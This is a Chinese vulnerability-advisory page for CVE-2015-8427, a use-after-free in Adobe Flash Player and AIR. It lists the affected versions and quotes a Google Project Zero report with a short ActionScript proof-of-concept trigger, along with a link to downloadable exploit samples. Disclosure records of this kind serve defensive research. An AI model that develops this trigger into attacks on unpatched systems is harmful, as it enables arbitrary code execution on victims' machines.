多款Adobe产品释放后重用漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1123155 漏洞类型 其他
发布时间 2015-12-18 更新时间 2015-12-18
CVE编号 CVE-2015-8427 CNNVD-ID CNNVD-201512-257
漏洞平台 Windows CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/39050
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201512-257
|漏洞详情
AdobeFlashPlayer、AdobeAIRSDK和AdobeAIRSDK&Compiler都是美国奥多比(Adobe)公司的产品。AdobeFlashPlayer是一款多媒体播放器产品;AdobeAIRSDK和AdobeAIRSDK&Compiler都是适用于AdobeAIR(一个跨操作系统的运行时环境)的标准开发工具包。多款Adobe产品中存在释放后重用漏洞。攻击者可利用该漏洞执行任意代码,控制受影响系统。以下产品及版本受到影响:基于Windows和Macintosh平台的AdobeFlashPlayerDesktopRuntime19.0.0.245及之前版本和AdobeFlashPlayerExtendedSupportRelease18.0.0.261及之前版本,基于Windows、Macintosh、Linux和ChromeOS平台的AdobeFlashPlayerforGoogleChrome19.0.0.245及之前版本,基于Windows10平台的AdobeFlashPlayerforMicrosoftEdgeandInternetExplorer1119.0.0.245及之前版本,基于Windows8.0和8.1平台的AdobeFlashPlayerforInternetExplorer10and1119.0.0.245及之前版本,基于Linux平台的AdobeFlashPlayerforLinux11.2.202.548及之前版本,基于Windows和Macintosh平台的AIRDesktopRuntime19.0.0.241及之前版本,基于Windows、Macintosh、Android和iOS平台的AIRSDK19.0.0.241及之前版本和AIRSDK&Compiler19.0.0.241及之前版本,基于Android平台的AIRforAndroid19.0.0.241及之前版本。
|漏洞EXP
Source: https://code.google.com/p/google-security-research/issues/detail?id=579

There is a use-after-free in the TextField.variable setter. If the variable name that is added is an object with toString defined, the toString function can free the field's parent object, which is then used. A minimal PoC is as follows:

var mc = this.createEmptyMovieClip("mc", 101);
var tf = mc.createTextField("tf", 102, 1, 1, 100, 100);
tf.variable = {toString : func};

function func(){

	mc.removeMovieClip();

        // Fix heap here

	return "myvar";
	
	}

A sample swf and fla are attached.


Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39050.zip
|参考资料

来源:helpx.adobe.com
链接:https://helpx.adobe.com/security/products/flash-player/apsb15-32.html